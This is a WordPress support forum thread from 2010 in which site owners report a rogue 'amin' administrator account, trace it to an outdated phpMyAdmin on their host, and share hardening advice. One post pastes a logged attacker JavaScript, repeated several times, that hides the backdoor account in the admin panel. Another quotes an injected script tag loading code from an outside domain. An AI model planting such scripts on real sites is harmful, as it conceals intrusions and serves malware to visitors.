Have I been hacked? Username: “amin”
-
I’ve had a username: “amin” with the name: as “…” show up as an administrative user mysteriously on a personal WordPress blog of mine. I was suspicious, deleted the user, and did a quick google search to see if I could find anything about a security breach. I didn’t find anything so I just shrugged of the concern.
Today I discovered the same “amin” user on a much bigger wordpress site I had built for a client; again with administrative privileges. Woah! Not cool.
These usernames were not added nor would in either case an administrative privilege be given. I’m running the most current version of WordPress 2.9.2 on both blogs and I’m a little nervous about the very real possibility that these blogs are being hacked.
Has anyone else noticed anything similar? Or share my concern?
-
I would say if you have any admin level user that you didn’t authorize, you definitely have some sort of security breach
I just discovered the same exact thing, and Googling this led me to your post.
Were you by chance affected by the Pharma hack over the past month or so?
I just posted that on another thread, but might help here.
We saw that on installations with WP < 2.9 lately. Also, even if you are now updated, your site might have been compromised before and the attackers left a backdoor hanging in there..
The sites also had this:
https://blog.sucuri.net/2010/05/seo-spam-network-code-used-and-more.html
https://blog.sucuri.net/2010/05/seo-spam-network-details-of-wp-includes.htmlHi. I managed to log amin’s activity using the Admin Log plugin. Here it is:
4/6/10 @ 21:43:12, (amin, ... <b id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script> ) => 4/6/10 @ 21:43:14, (amin, ... <b id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script> ) => options-misc.php 4/6/10 @ 21:43:23, (amin, ... <b id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script> ) => theme-editor.php 4/6/10 @ 21:43:24, (amin, ... <b id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script> ) => theme-editor.php?file=/themes/wp-316.gr/category.php&theme=316.gr&dir=theme 4/6/10 @ 21:43:27, (amin, ... <b id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script> ) => theme-editor.php?file=/themes/wp-316.gr/category.php&theme=316.gr&dir=theme 4/6/10 @ 21:43:30, (amin, ... <b id="user_superuser"><script language="JavaScript"> var setUserName = function(){ try{ var t=document.getElementById("user_superuser"); while(t.nodeName!="TR"){ t=t.parentNode; }; t.parentNode.removeChild(t); var tags = document.getElementsByTagName("H3"); var s = " shown below"; for (var i = 0; i < tags.length; i++) { var t=tags[i].innerHTML; var h=tags[i]; if(t.indexOf(s)>0){ s =(parseInt(t)-1)+s; h.removeChild(h.firstChild); t = document.createTextNode(s); h.appendChild(t); } } var arr=document.getElementsByTagName("ul"); for(var i in arr) if(arr[i].className=="subsubsub"){ var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML); if(n!=null && n[1]>0){ var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<"); arr[i].innerHTML=txt; } } }catch(e){}; }; addLoadEvent(setUserName); </script> ) => theme-editor.php?file=/themes/wp-316.gr/category.php&theme=316.gr&dir=themeUp to now, he wasn’t doing anything. Today I found a new post message containing JS malicious code, such as
<script src=https://e1b.smartenergymodel.com/js/jquery.min.js></script>Someone please help us. This is a major issue.
One of the first things you can do while you get this sorted out is restrict access to your wp-admin directory by ip by adding this to your .htaccess file:
order deny,allow allow from a.b.c.d # This is your static IP deny from allthen change all your wordpress ftp and server passwords,check your file permissions, and change your MySql db password and reset your salts via wp-config.php
This should give you some breathing room while you check and clean your site.
First, remain calm, delete the “amin” user, and carefully follow this guide:
The question is: Why did this happen in the first place? How did the hacker manage to create a new user account WITH ADMINISTRATIVE privileges?
This is absolutely insane.
We caught the amin user in time, but this guy has still managed to get into our system and change files and cause general havoc. We’ve been dealing with this since April, and it seems like every month, they figure out a new way to get access!
This is driving me crazy, as we’ve done EVERYTHING we can from a security standpoint, and still we’re getting hacked.
Just out of curiosity, dmichalakos and craighobson, who are you hosting your site with?
I am also curious who all three of your hosting providers are and if you are on shared hosting. Also have you contacted your hosting provider about this?
I am hosting my websites on rackspace cloud (https://www.rackspacecloud.com).
I have indeed contacted Rackspace technical support. They said it is normal for wordpress to get hacked occasional and propose to clean the files and harden the installation.
Btw I am following the practice of no admin user and custom db prefix. I am also using several security plugins, such as Secure WP and WP antivirus. Nevertheless, my websites got hacked.
The only thing I did not do is securing the wp-admin folder with an htaccess/htpasswd file.
I am seeing this all over Rackspace Cloud Sites, in multiple accounts regardless of permissions, plugins, or configuration. Haven’t found a common thread yet – but it’s almost everywhere I work.
Anyone have any idea what the attack vector is here?
Rackspace Cloud currently uses phpMyAdmin 2.11.3 [1], which has critical security holes [2]. Until Rackspace upgrades their version of phpMyAdmin, it’s likely that your sites will continue to get hacked.
[1] https://mysql.websitesettings.com/Documentation.html
[2] https://www.phpmyadmin.net/home_page/security/PMASA-2010-3.phpHas anyone found this attack affecting anything beyond the creation of the amin user account?
Also RS is posting that they have patched the issue.
https://status.mosso.com/2010/06/emergency-phpmyadmin-maintenance-ongoing.html
Looks like Rackspace has upgraded their phpMyAdmin software to 2.11.10 now. Hopefully this will help!
If the attacker created backdoor accounts or installed trojan software onto the servers, he’ll still be able to cause trouble. Hopefully, Rackspace will watch for this and prevent further damage.
- The topic ‘Have I been hacked? Username: “amin”’ is closed to new replies.